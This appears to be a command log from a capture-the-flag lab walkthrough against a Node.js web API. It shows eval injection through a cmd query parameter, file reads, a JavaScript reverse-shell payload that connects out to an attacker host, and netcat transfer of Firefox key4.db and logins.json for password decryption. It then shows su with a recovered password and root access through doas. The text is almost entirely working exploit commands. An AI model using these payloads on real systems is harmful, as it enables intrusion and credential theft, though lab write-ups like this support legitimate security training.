1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43

export ip=<redacted>
firefox http://$ip
firefox http://$ip/api/access

# add this_is_not_real cookie in the page
firefox http://$ip 

firefox http://$ip/js/script.js 
# fuzz API parameters
wfuzz -c -z file,/usr/share/wordlists/dirb/common.txt -X POST --hc 400 -u http://$ip/api/items\?FUZZ\=test

# EXPLOIT node js eval check 
firefox http://$ip/api/item?cmd=1
api/item?cmd=process.cwd()
api/item?cmd=var fs=require("fs");fs.readdirSync("/var/web").toString('utf8')
api/item?cmd=var fs=require("fs");fs.readFileSync("/var/web/app.js").toString('utf8')

# view api.js
/api/items?cmd=var+fs%3drequire("fs")%3bfs.readFileSync("/var/web/routes/api.js").toString('utf8')
# ACCESS: reverse shell
api/item?cmd=(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(4444, "<sanitized>", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/;})();

# target-machine
python3 -c 'import pty; pty.spawn("/bin/bash")'
cat /home/user/user.txt
cd /home/user/.firefox 

# HORIZONTAL PRIVESC: firefox keys
# transferring firefox keys 
nc -l -p 1234  > key4.db < /dev/null
nc -nv <redacted> 1234 < key4.db
nc -l -p 1234  > logins.json < /dev/null 
nc -nv <redacted> 1234 < logins.json

# firepwd firefox 
python firepwd.py -d /

su v0id # pass: love_the_void

# VERTICAL PRIVESC: doas
doas -u root whoami
doas -u root /bin/bash
cat /root/root.txt